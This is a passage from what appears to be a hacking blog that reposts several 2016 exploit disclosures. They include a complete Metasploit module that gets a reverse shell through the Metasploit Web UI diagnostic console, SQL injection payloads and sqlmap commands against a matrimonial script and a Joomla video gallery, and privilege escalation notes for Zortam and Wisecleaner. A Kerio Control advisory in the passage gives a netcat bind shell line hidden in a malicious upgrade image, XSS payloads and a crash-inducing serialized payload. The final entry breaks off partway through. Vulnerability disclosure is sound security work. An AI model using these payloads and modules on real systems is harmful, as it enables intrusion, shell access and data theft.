# Exploit Title: Zortam Mp3 Media Studio 21.15 Insecure File Permissions Privilege Escalation
# Date: 23/09/2016
# Exploit Author: Tulpa
# Contact: tulpa@tulpa-security.com
# Author website: www.tulpa-security.com
# Vendor Homepage: http://www.zortam.com/
# Software Link: http://www.zortam.com/download.html
# Version: Software Version 21.15
# Tested on: Windows 10 Professional x64, Windows XP SP3 x86, Windows Server 2008 R2 x64
# Shout-out to carbonated and ozzie_offsec
1. Description:
Zortam Mp3 Media Studio installs by default to "C:\Program Files (x86)\Zortam Mp3 Media Studio\zmmspro.exe" with very weak file permissions granting any user full permission to the exe. This allows opportunity for code execution against any other user running the application.
2. Proof
C:\Program Files\Zortam Mp3 Media Studio>cacls zmmspro.exe
C:\Program Files\Zortam Mp3 Media Studio\zmmspro.exe BUILTIN\Users:F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
3. Exploit:
Simply replace zmmspro.exe and wait for execution.
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863588214
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
######################
# Application Name : Matrimonial Website Script v1.0.2
# Google Dork : inurl:viewfullprofile1.php?id=
# Exploit Author : Cyber Warrior | Bug Researchers Group | N4TuraL
# Author Contact : https://twitter.com/byn4tural
# Vendor Homepage : http://www.i-netsolution.com/
# Vulnerable Type : SQL Injection
# Date : 2016-09-22
# Tested on : Windows 10 / Mozilla Firefox
# Linux / Mozilla Firefox
# Linux / sqlmap 1.0.6.28#dev
###################### SQL Injection Vulnerability ######################
# Location :
http://localhost/[path]/viewfullprofile1.php
######################
# PoC Exploit:
http://localhost/[path]/viewfullprofile1.php?id=MM57711%20and%20%2F*%2130000if%28exists%28select%20concat%280x7233646D3076335F73716C5F696E6A656374696F6E%2Ccount%28*%29%29%20from%20%3F%3F%3F.%E7%AE%A1%E7%90%86%E5%91%98%29%2CBENCHMARK%281161102%2C8%2CMD5%280x41%29%29%2C0%29*%2F
http://localhost/[path]/viewfullprofile1.php?id=MM57711%27%20AND%205860%3DIF%28%28ORD%28MID%28%28IFNULL%28CAST%28DATABASE%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C1%29%29%3E1%29%2CSLEEP%285%29%2C5860%29%20AND%20%27wvYf%27%3D%27wvYf
# Exploit Code via sqlmap:
sqlmap -u http://localhost/[path]/viewfullprofile1.php?id=MM57711 --dbs
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=MM57711' AND 2424=2424 AND 'PgBT'='PgBT
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=MM57711' AND SLEEP(5) AND 'AgXd'='AgXd
---
######################
# Exploit Title: Wisecleaner Software Multiple Unquoted Service Path Elevation of Privilege
# Date: 23/09/2016
# Exploit Author: Tulpa
# Contact: tulpa@tulpa-security.com
# Author website: www.tulpa-security.com
# Vendor Homepage: http://www.wisecleaner.com
# Software Link: http://www.wisecleaner.com/wise-disk-cleaner.html, http://www.wisecleaner.com/wise-care-365.html
# Version: Wise Care 365 4.27, Wise Disk Cleaner 9.29
# Tested on: Windows 7 x86
# Shout-out to carbonated and ozzie_offsec
1. Description:
Two seperate instances of unquoted service path privilege escalation has been discovered. The first instance is within Wise Care 365 4.27 which installs a vulnerable service entitled WiseBootAssistant. The second vulnerability exists when Wise Disk Cleaner 9.29 installs SpyHunter 4. Both of these services run with SYSTEM privileges. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system.
2. Proof
Wise Disk Cleaner 9.29
C:\>sc qc WiseBootAssistant
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: WiseBootAssistant
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Wise\Wise Care 365\BootTime.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Wise Boot Assistant
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
SpyHunter 4
C:\>sc qc "SpyHunter 4 Service"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: SpyHunter 4 Service
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe
LOAD_ORDER_GROUP : Base
TAG : 0
DISPLAY_NAME : SpyHunter 4 Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
3. Exploit:
A successful attempt would require the local user to be able to insert their
code in the system root path undetected by the OS or other security applications
where it could potentially be executed during application startup or reboot.
If successful, the local user's code would execute with the elevated privileges
of the application.
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Metasploit Web UI Diagnostic Console Command Execution',
'Description' => %q{
This module exploits the "diagnostic console" feature in the Metasploit
Web UI to obtain a reverse shell.
The diagnostic console is able to be enabled or disabled by an
administrator on Metasploit Pro and by an authenticated user on
Metasploit Express and Metasploit Community. When enabled, the
diagnostic console provides access to msfconsole via the web interface.
An authenticated user can then use the console to execute shell
commands.
NOTE: Valid credentials are required for this module.
Tested against:
Metasploit Community 4.1.0,
Metasploit Community 4.8.2,
Metasploit Community 4.12.0
},
'Author' => [ 'Justin Steven' ], # @justinsteven
'License' => MSF_LICENSE,
'Privileged' => true,
'Arch' => ARCH_CMD,
'Payload' => { 'PayloadType' => 'cmd' },
'Targets' =>
[
[ 'Unix',
{
'Platform' => [ 'unix' ]
}
],
[ 'Windows',
{
'Platform' => [ 'windows' ]
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 23 2016'
))
register_options(
[
OptBool.new('SSL', [ true, 'Use SSL', true ]),
OptPort.new('RPORT', [ true, '', 3790 ]),
OptString.new('TARGETURI', [ true, 'Metasploit Web UI base path', '/' ]),
OptString.new('USERNAME', [ true, 'The user to authenticate as' ]),
OptString.new('PASSWORD', [ true, 'The password to authenticate with' ])
], self.class)
end
def do_login()
print_status('Obtaining cookies and authenticity_token')
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'login'),
})
unless res
fail_with(Failure::NotFound, 'Failed to retrieve login page')
end
unless res.headers.include?('Set-Cookie') && res.body =~ /name="authenticity_token"\W+.*\bvalue="([^"]*)"/
fail_with(Failure::UnexpectedReply, "Couldn't find cookies or authenticity_token. Is TARGETURI set correctly?")
end
authenticity_token = $1
session = res.get_cookies
print_status('Logging in')
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'user_sessions'),
'cookie' => session,
'vars_post' =>
{
'utf8' => '\xE2\x9C\x93',
'authenticity_token' => authenticity_token,
'user_session[username]' => datastore['USERNAME'],
'user_session[password]' => datastore['PASSWORD'],
'commit' => 'Sign in'
}
})
unless res
fail_with(Failure::NotFound, 'Failed to log in')
end
return res.get_cookies, authenticity_token
end
def get_console_status(session)
print_status('Getting diagnostic console status and profile_id')
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'settings'),
'cookie' => session,
})
unless res
fail_with(Failure::NotFound, 'Failed to get diagnostic console status or profile_id')
end
unless res.body =~ /\bid="profile_id"\W+.*\bvalue="([^"]*)"/
fail_with(Failure::UnexpectedReply, 'Failed to get profile_id')
end
profile_id = $1
if res.body =~ /<input\W+.*\b(id="allow_console_access"\W+.*\bchecked="checked"|checked="checked"\W+.*\bid="allow_console_access")/
console_status = true
elsif res.body =~ /<input\W+.*\bid="allow_console_access"/
console_status = false
else
fail_with(Failure::UnexpectedReply, 'Failed to get diagnostic console status')
end
print_good("Console is currently: #{console_status ? 'Enabled' : 'Disabled'}")
return console_status, profile_id
end
def set_console_status(session, authenticity_token, profile_id, new_console_status)
print_status("#{new_console_status ? 'Enabling' : 'Disabling'} diagnostic console")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'settings', 'update_profile'),
'cookie' => session,
'vars_post' =>
{
'utf8' => '\xE2\x9C\x93',
'_method' => 'patch',
'authenticity_token' => authenticity_token,
'profile_id' => profile_id,
'allow_console_access' => new_console_status,
'commit' => 'Update Settings'
}
})
unless res
fail_with(Failure::NotFound, 'Failed to set status of diagnostic console')
end
end
def get_container_id(session, container_label)
container_label_singular = container_label.gsub(/s$/, "")
print_status("Getting ID of a valid #{container_label_singular}")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, container_label),
'cookie' => session,
})
unless res && res.body =~ /\bid="#{container_label_singular}_([^"]*)"/
print_warning("Failed to get a valid #{container_label_singular} ID")
return
end
container_id = $1
vprint_good("Got: #{container_id}")
container_id
end
def get_console(session, container_label, container_id)
print_status('Creating a console, getting its ID and authenticity_token')
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, container_label, container_id, 'console'),
'cookie' => session,
})
unless res && res.headers['location']
fail_with(Failure::UnexpectedReply, 'Failed to get a console ID')
end
console_id = res.headers['location'].split('/')[-1]
vprint_good("Got console ID: #{console_id}")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, container_label, container_id, 'consoles', console_id),
'cookie' => session,
})
unless res && res.body =~ /console_init\('console', 'console', '([^']*)'/
fail_with(Failure::UnexpectedReply, 'Failed to get console authenticity_token')
end
console_authenticity_token = $1
return console_id, console_authenticity_token
end
def run_command(session, container_label, console_authenticity_token, container_id, console_id, command)
print_status('Running payload')
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, container_label, container_id, 'consoles', console_id),
'cookie' => session,
'vars_post' =>
{
'read' => 'yes',
'cmd' => command,
'authenticity_token' => console_authenticity_token,
'last_event' => '0',
'_' => ''
}
})
unless res
fail_with(Failure::NotFound, 'Failed to run command')
end
end
def exploit
session, authenticity_token = do_login()
original_console_status, profile_id = get_console_status(session)
unless original_console_status
set_console_status(session, authenticity_token, profile_id, true)
end
if container_id = get_container_id(session, "workspaces")
# target calls them "workspaces"
container_label = "workspaces"
elsif container_id = get_container_id(session, "projects")
# target calls them "projects"
container_label = "projects"
else
fail_with(Failure::Unknown, 'Failed to get workspace ID or project ID. Cannot continue.')
end
console_id, console_authenticity_token = get_console(session, container_label,container_id)
run_command(session, container_label, console_authenticity_token,
container_id, console_id, payload.encoded)
unless original_console_status
set_console_status(session, authenticity_token, profile_id, false)
end
handler
end
end
SEC Consult has also released a blog post describing the attack scenarios
of the vulnerabilities within this advisory in detail and a video which
shows the remote attack. Exploit code has been developed as well but will
not be released for now.
Blog:
http://blog.sec-consult.com/2016/09/controlling-kerio-control-when-your.html
Video:
https://www.youtube.com/watch?v=y_OWz25sHMI
SEC Consult Vulnerability Lab Security Advisory < 20160922-0 >
=======================================================================
title: Potential backdoor access through multiple vulnerabilities
product: Kerio Control Unified Threat Management
vulnerable version: <9.1.3, verified in version 9.1.0 build 1087 and 9.1.1
build 1324
fixed version: 9.1.3 (partially fixed, see vendor statement below)
CVE number: -
impact: critical
homepage: http://www.kerio.com/
found: 2016-08-24
by: R. Freingruber (Office Vienna)
R. Tavakoli (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"Protect your network from viruses, malware and malicious activity
with Kerio Control, the easy-to-administer yet powerful all-in-one
security solution.
Kerio Control brings together next-generation firewall capabilities -
including a network firewall and router, intrusion detection and
prevention (IPS), gateway anti-virus, VPN, and web contentand
application filtering. These comprehensive capabilities and unmatched
deployment flexibility make Kerio Control the ideal choice for small
and mid-sized businesses."
Source: http://www.kerio.com/products/kerio-control
Business recommendation:
------------------------
By combining the vulnerabilities documented in this advisory an attacker
can fully compromise a network which uses the Kerio Control appliance for
protection.
The attacker can trick a victim to visit a malicious website which then conducts
the internal attack. The attacked victim must be logged in or weak credentials
must be configured which can be found with a bruteforce attack.
The attacker will gain a reverse root shell from the Internet to the internal
Kerio Control firewall system. Moreover, it's possible that an internal attacker
uses the described vulnerabilities to escalate his privileges (low privileged
account to full root shell) to steal credentials from other users on the UTM
appliance.
Most vulnerabilities (RCE, CSRF bypasses, XSS, Heap Spraying) were found
in just two PHP scripts. Both scripts are not referenced by any other
PHP script nor by any binary on the system.
Both scripts contain a different(!), seemingly deliberate(?) CSRF bypass
which make the vulnerabilities exploitable from the Internet to obtain a
reverse root shell.
SEC Consult recommends not to use Kerio Control until a thorough security
review has been performed by security professionals and all identified
issues have been resolved.
Vulnerability overview/description:
-----------------------------------
1) Unsafe usage of the PHP unserialize function and outdated PHP version leads
to remote-code-execution
An authenticated user (standard user or administrator) can control data, which
gets later unserialized. Kerio Control uses PHP 5.2.13 which was released on
2010-02-25. This version is more than 6 years old and several bugs were found
in the meantime within the unserialize function. The following CVE numbers
are just some examples for vulnerabilities in unserialize which lead to remote
code execution:
-) CVE-2014-8142
-) CVE-2014-3515
-) CVE-2015-0231
-) CVE-2015-6834
-) CVE-2016-5771
-) CVE-2016-5773
PHP 5.2.13 is especially affected by CVE-2014-3515. This vulnerability uses a
type confusion attack to trigger a use-after-free vulnerability. It can be used
to read data and get full code execution. In the case of Kerio Control the
result of unserialize is not reflected back to the attacker. It's therefore not
possible to read memory from the stack or heap (e.g. to bypass ASLR).
Nevertheless, SEC Consult developed a fully working and reliable (blind) exploit
for this vulnerability which spawns a reverse root shell to the Kerio Control
system.
For this exploit a user account is required. However, it's also possible to
conduct the attack via the Internet because the CSRF (Cross Site Request
Forgery) check can be bypassed (see below).
An attacker can use this vulnerability to break into a company network via the
Internet by tricking a logged in user to visit a malicious website. Even if the
user is currently not logged in the attacker can start a bruteforce attack to
obtain valid credentials to conduct the attack.
2) PHP script allows heap spraying
One of the PHP scripts allows the allocation of memory inside the main binary
(winroute) of Kerio Control. Winroute contains the code of most services
(e.g. the webserver, PHP, network related functionality, ...).
The memory will not be freed after finishing the request and can therefore be
used to spray payloads to the whole memory space.
This vulnerability was used in the overall exploit to defeat ASLR.
Please bear in mind that it's very likely that an attacker can write a working
exploit without heap spraying. Fixing this vulnerability would therefore not
prevent the exploitation of the remote code execution vulnerability.
For example, the information disclosure vulnerability from this advisory can
be used to bypass ASLR as well. This would eliminate the need of heap spraying.
3) CSRF Protection Bypass
The PHP scripts contain code to protect against CSRF (Cross Site Request
Forgery) attacks. Because of the wrong usage of PHP binary
operations and comparisons it's possible to bypass this check. That means
that an attacker can trigger requests from other websites which will be handled
by Kerio Control. This vulnerability allows to exploit the remote code
execution vulnerability from the Internet to break into a network.
4) Webserver running with root privileges
The main binary (which contains the webserver and PHP) runs with root
privileges.
Kerio told SEC Consult that this vulnerability will not be fixed. SEC
Consult strongly recommended otherwise.
5) Reflected Cross Site Scripting (XSS)
Kerio Control does not properly encode parameters which are reflected on the
website. This leads to cross site scripting vulnerabilities.
An attacker can abuse these vulnerabilities to modify the website or do actions
in the context of the attacked user.
6) Missing memory corruption protections
The main binary (winroute) is not compiled as position-independent executable
(PIE). This allowed the use of ROP (return-oriented-programming) code to
bypass the not executable heap. Moreover, the stack is per default marked as
executable, but the exact location of the stack is randomized by ASLR.
7) Information Disclosure leads to ASLR bypass
One of the PHP scripts leaks pointers to the stack and heap.
This can be abused by attackers to bypass ASLR.
Because stacks are marked as executable an attacker can therefore easily bypass
ASLR and DEP/NX.
8) Remote Code Execution as administrator
Nearly a year ago on 2015-10-12 Raschin Tavakoli reported a remote code
execution vulnerability in the administrative web interface in the upgrade
functionality. This vulnerability is still unfixed, only the associated XSS
vulnerability was fixed. However, an attacker can still exploit it from the
Internet, e.g. by abusing the XSS vulnerability described in this advisory
(where the CSRF check can be bypassed).
With this vulnerability an attacker can gain a reverse root shell on
Kerio Control again if a logged in administrator visits a malicious website
on the Internet.
More information can also be found in the old advisory:
https://www.exploit-db.com/exploits/38450/
9) Login not protected against brute-force attacks
There are no bruteforce protections in place for the login.
If an unauthenticated victim visits an attacker's website, the attacker can
start a bruteforce attack to obtain valid credentials to execute the
remote code execution exploit. Via image-loading the attacker can detect if
the current credentials are valid (without violating SOP).
Proof of concept:
-----------------
1) Unsafe usage of the PHP unserialize function and outdated PHP version leads
to remote-code-execution
The following request can be used to set the unserialize data. In this example
a faked string is used which points to 0xffffffff (kernel memory). Unserializing
it will therefore crash the remote webserver (the winroute process).
POST /set.php HTTP/1.1
Host: $IP:4081
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Cookie: SESSION_CONTROL_WEBIFACE=<valid session ID>;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 730
k_securityHash=x&target=k_sessionVariable&k_variable=lastDisplayed&k_value=a:18:{s:8:"k_dbName";s:5:"error";s:11:"k_dbSummara";s:3:"abc";s:14:"k_dbIndividual";s:3:"abc";s:16:"k_dbLastUsedType";s:3:"abc";s:10:"k_dbLayout";s:3:"abc";s:10:"k_pageType";s:3:"abc";s:13:"k_periodStart";i:123;s:11:"k_periodEnd";i:123;s:8:"k_userId";i:123;s:6:"tabBar";i:123;s:13:"k_gotoElement";i:123;s:9:"k_protoId";i:123;s:11:"k_errorType";i:123;s:16:"k_timezoneOffset";i:123;s:9:"k_groupId";i:123;s:2:"id";i:123;s:11:"k_dbSummary";C:16:"SplObjectStorage":152:{x:i:2;O:8:"stdClass":1:{i:0;a:2:{i:1;i:1;i:2;i:2;}};d:2.0851592721051977e-262;;m:a:2:{i:0;S:15:"\ff\ff\ff\ff\20\00\00\00\01\00\00\00\06\00\00";i:1;R:3;}}s:18:"k_historyTimestamp";s:3:"abc";}
The following request will call unserialize on the injected data:
GET /contentLoader.php?k_getHistoryId=1&k_securityHash=x HTTP/1.1
Host: $IP:4081
Cookie: SESSION_CONTROL_WEBIFACE=<valid session ID>;
Connection: close
In the example above only a denial of service will be conducted. However, an
attacker can change the data type to object to get full code execution on
the remote system.
SEC Consult developed a fully working exploit for this attack which spawns a
root shell. Please note that this exploit was intentionally written to just
target Kerio Control 9.1.0 Build 1087. This is because hardcoded offsets
are used which belong to the winroute binary with the SHA256 hash:
2808c35528b9a4713b91f65a881dfca03088de08b6331fdee1c698523bd757b0
This exploit will not be released for now.
A real-world-attacker can detect the remote binary version by bruteforcing
the object handler related to CVE-2014-3515.
2) PHP script allows heap spraying
The set.php script contains the following code:
$p_variable = urldecode($_POST['k_variable']);
$p_value = urldecode($_POST['k_value']);
...
$p_session->setSessionVariable($p_variable, $p_value);
POST requests with the following parameters can therefore be used to allocate
space on the remote system:
k_securityHash=x&target=k_sessionVariable&k_variable=<random_name>
&k_value=<payload_to_allocate>
During tests it was possible to spray approximately 400 MB data in 30 seconds
which is enough to control two predictable addresses on the heap.
3) CSRF Protection Bypass
Two scripts are required for the remote code execution exploit:
-) set.php
-) ContentLoader.php
Both scripts contain different very interesting CSRF check bypasses.
The following code can be found in set.php:
$p_session->getCsrfToken(&$p_securityHash);
$p_postedHash = $_GET['k_securityHash'] || $_POST['k_securityHash'];
if ('' == $p_postedHash || ($p_postedHash != $p_securityHash)) {
exit();
}
Since the programming language is PHP (and not JavaScript), the above code code
does not work as expected. $p_postedHash can only become 0 or 1 because || is a
logical operator. The if-condition compares the valid token with the posted one
via the != operator, however, this will not check if types are the same.
If k_securityHash is set (either via GET or POST) to any value, the above code
will compare the number 1 with a string, which will always bypass the check.
It's therefore enough to set k_securityHash to any value to bypass the CSRF
protection.
The following code can be found in contentLoader.php:
$p_session->getCsrfToken(&$p_securityHash);
$p_postedHash = $_GET['k_securityHash'];
...
if (!$p_session || ('' == $p_postedHash && $p_postedHash != $p_securityHash)) {
$p_page = new p_Page();
$p_page->p_jsCode('window.top.location = "index.php";');
$p_page->p_showPageCode();
die();
}
Now the programmers only use the GET parameter, however, they changed the
logical operator in the if condition from || to && which means that the CSRF
check will only be applied if $p_postedHash is empty. It's therefore again
enough to set k_securityHash to any value to bypass the check.
4) Webserver running with root privileges
No proof of concept necessary.
5) Reflected Cross Site Scripting (XSS)
In the following request the k_historyTimestamp parameter is prone to XSS:
https://<IP>:4081/contentLoader.php?k_dbName=x&k_securityHash=x
&k_historyTimestamp=aa%22;alert(1)%3b//
In the same request the id parameter can be used to inject JavaScript code.
Note that the attack can only be conducted against administrative users.
Users with standard privileges can only access pages with k_dbName set to one
of the following values:
-) accStats
-) prefs
-) dialup
-) error
In such a case Kerio Control adds code like the following
(in this example k_dbName=dialup):
var k_newDbName = "<kerio:text id="tabCaption_dialup"/>";
The " characters within the string are not correctly encoded.
This will lead to the termination of the JavaScript execution. Because the
injected payload is stored after this code, the attacker must bypass this
code to ensure that the payload gets executed. This is only possible if
the attacked user is an administrator because administrators can load any
dbName. By setting k_dbName to an invalid dbName (e.g. to 'x'), code like
the following will be added instead (which does not crash):
var k_newDbName = "";
Another XSS can be found at:
https://<IP>:4081/admin/internal/dologin.php?hash=%0D%0A"><script>alert(1);</script><!--
6) Missing memory corruption protections
No proof of concept necessary.
7) Information Disclosure leads to ASLR bypass
The following request returns information to the currently logged in user
(e.g. session token and username):
GET /nonauth/getLoginType.js.php HTTP/1.1
Host: $IP:4081
Cookie: SESSION_CONTROL_WEBIFACE=<valid session ID>;
Connection: close
The following is a typical response:
HTTP/1.1 200 OK
Connection: Close
Content-type: text/html
Date: Tue, 24 Aug 2016 11:47:34 GMT
Server: Kerio Control Embedded Web Server
X-UA-Compatible: IE=edge
k_loginParams.k_loginType = "loginUnlock";k_loginParams.k_nonauthToken =
"0xb59066a8";k_loginParams.k_sessionToken =
"bc7c9ae78f01e498b7c935b4ad521b664d4e2c5574bde30cdf57851a58763660";k_loginParams.k_loggedUser
= {k_asocName: "user", k_fullName: "user"};
The above response contains a valid pointer (0xb59066a8). In most cases this
pointer will point to the heap. However, sometimes this pointer will point
into a readable and writeable region behind a stack-region.
The target location always stores the same data. During the analysis no
further effort was spent on analysing this behaviour.
The pointer will also be disclosed if the user is already logged out.
In such a case the response looks like:
HTTP/1.1 200 OK
Connection: Close
Content-type: text/html
Date: Tue, 24 Aug 2016 12:04:44 GMT
Server: Kerio Control Embedded Web Server
X-UA-Compatible: IE=edge
k_loginParams.k_loginType = "loginCommon";k_loginParams.k_nonauthToken =
"0xb2ee208";
An attack scenario can be:
-) The attacker tricks a victim to visit the attacker's malicious website
-) The attacker's website uses the CSRF bypass and the identified XSS
vulnerability to embed a malicious script inside the Kerio Control website
-) The attacker's website iframes the Kerio Control website to trigger the
execution of the XSS payload
-) The XSS payload runs on the same domain and can therefore send requests
and read responses. This means the attacker can send requests to
getLoginType.js.php to obtain a memory pointer.
-) If the memory pointer is within a specific range (e.g. the highest nibble
is zero), it's a pointer to the heap. In such a case the RCE vulnerability
can be used to crash and restart the server. After that the same check can
be done again.
-) If the memory pointer points near a stack (highest nibble is 0xb), the
pointer can be used to calculate the base address of a stack.
-) Now the attacker knows the location of a stack (all stacks are marked as
readable, writeable and executable). He can now easily bypass ASLR and DEP.
8) Remote Code Execution as administrator
An attacker can create a malicious upgrade image with the following
commands:
cat upgrade.sh
#!/bin/bash
nc -lp 9999 -e /bin/bash &
tar czf upgrade.tar.gz *
mv upgrade.tar.gz upgrade.img
The image can be uploaded in the administrative web interface.
This will bind a root shell on port 9999. The complete attack can also be
conducted via the cross site scripting vulnerability described in this
advisory (XSS in contentLoader.php). This enables an attacker to conduct
the attack from the Internet to obtain a reverse shell on Kerio Control.
9) Login not protected against brute-force attacks
Valid credentials can be obtained via a brute-force attack.
It's enough to send a POST request to /internal/dologin.php with the
parameters kerio_username and kerio_password set. A remote attacker
can detect if the credentials are correct without reading the
response (SOP would not allow to read the response). This is possible
because /internal/photo will only return a valid image if the user is
currently logged in. The attacker can load an image from this URL and
check if loading was successful to leak the information if the
credentials are valid or not.
The following code demonstrates this:
<img src="https://<Kerio-IP>/internal/photo" onerror=not_logged_in();
onload=logged_in();></img>
Vulnerable / tested versions:
-----------------------------
The following product versions were found to be vulnerable which were the
latest versions available at the time of the discovery:
v9.1.0 (Build 1087)
v9.1.1 (Build 1324)
Vendor contact timeline:
------------------------
2016-08-29: Contacting vendor through website
(bug report: bugreports@support.kerio.com) Ticket-ID: MYW-768664
2016-08-31: No answer, contacting CTO of Kerio via email
2016-09-01: Received security contact with PGP & S/MIME certificate
2016-09-01: Transmission of PGP encrypted advisory to Kerio
2016-09-09: Received answer, Kerio confirms vulnerabilities 1,2,3,5,6,7
Statement to vulnerability 9:
"the feature already is in the product."
Statement to vulnerabilities 4 (Webserver running with root
privileges) and 8 (Remote Code Execution as administrator):
"I do not consider this a vulnerability"
Update including a fix will be available on 2016-09-20
2016-09-09: SEC Consult informed Kerio to re-think the decision
not fixing the vulnerabilities 4, 8 and 9
SEC Consult highly recommends to fix all reported issues
2016-09-13: SEC Consult informed Kerio that the advisory will be
released on 2016-09-22
2016-09-20: Kerio releases patch for Kerio Control
2016-09-22: Coordianted release of security advisory
Solution:
---------
The vendor has released version 9.1.3 on 20th September which, according
to the vendor, fixes the vulnerabilities 1,2,3,5,6,7.
The vendor told us the following regarding vulnerability 9:
"the feature already is in the product"
Vulnerability 4 and 8 are not considered a vulnerability by the vendor
and will not be fixed.
SEC Consult strongly recommended fixing issue 4 and 8 as well.
The latest version can be downloaded from here:
http://www.kerio.com/support/kerio-control
http://www.kerio.com/support/kerio-control/release-history
Workaround:
-----------
None
Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin - Linz - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF R. Freingruber / @2016
Title: Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9 for Joomla
Author: Larry W. Cashdollar, @_larry0
Date: 2016-09-15
Download Site: http://huge-it.com/joomla-video-gallery/
Vendor: www.huge-it.com, fixed v1.1.0
Vendor Notified: 2016-09-17
Vendor Contact: info@huge-it.com
Description: A video slideshow gallery.
Vulnerability:
The following code does not prevent an unauthenticated user from injecting SQL into functions located in ajax_url.php.
Vulnerable Code in : ajax_url.php
11 define('_JEXEC',1);
12 defined('_JEXEC') or die('Restircted access');
.
.
.
28 if($_POST['task']=="load_videos_content"){
29
30 $page = 1;
31
32
33 if(!empty($_POST["page"]) && is_numeric($_POST['page']) && $_POST['page']>0){
34 $paramssld='';
35 $db5 = JFactory::getDBO();
36 $query5 = $db->getQuery(true);
37 $query5->select('*');
38 $query5->from('#__huge_it_videogallery_params');
39 $db->setQuery($query5);
40 $options_params = $db5->loadObjectList();
41 foreach ($options_params as $rowpar) {
42 $key = $rowpar->name;
43 $value = $rowpar->value;
44 $paramssld[$key] = $value;
45 }
46 $page = $_POST["page"];
47 $num=$_POST['perpage'];
48 $start = $page * $num - $num;
49 $idofgallery=$_POST['galleryid'];
50
51 $query = $db->getQuery(true);
52 $query->select('*');
53 $query->from('#__huge_it_videogallery_videos');
54 $query->where('videogallery_id ='.$idofgallery);
55 $query ->order('#__huge_it_videogallery_videos.ordering asc');
56 $db->setQuery($query,$start,$num);
CVE-2016-1000123
Exploit Code:
aC/ $ sqlmap -u 'http://server/components/com_videogallerylite/ajax_url.php' --data="page=1&galleryid=*&task=load_videos_content&perpage=20&linkbutton=2" --level=5 --risk=3
aC/ .
aC/ .
aC/ .
aC/ (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
aC/ sqlmap identified the following injection point(s) with a total of 2870 HTTP(s) requests:
aC/ ---
aC/ Parameter: #1* ((custom) POST)
aC/ Type: error-based
aC/ Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
aC/ Payload: page=1&galleryid=-3390 OR 1 GROUP BY CONCAT(0x716b766271,(SELECT (CASE WHEN (2575=2575) THEN 1 ELSE 0 END)),0x7170767071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&task=load_videos_content&perpage=20&linkbutton=2
aC/
aC/ Type: AND/OR time-based blind
aC/ Title: MySQL >= 5.0.12 time-based blind - Parameter replace
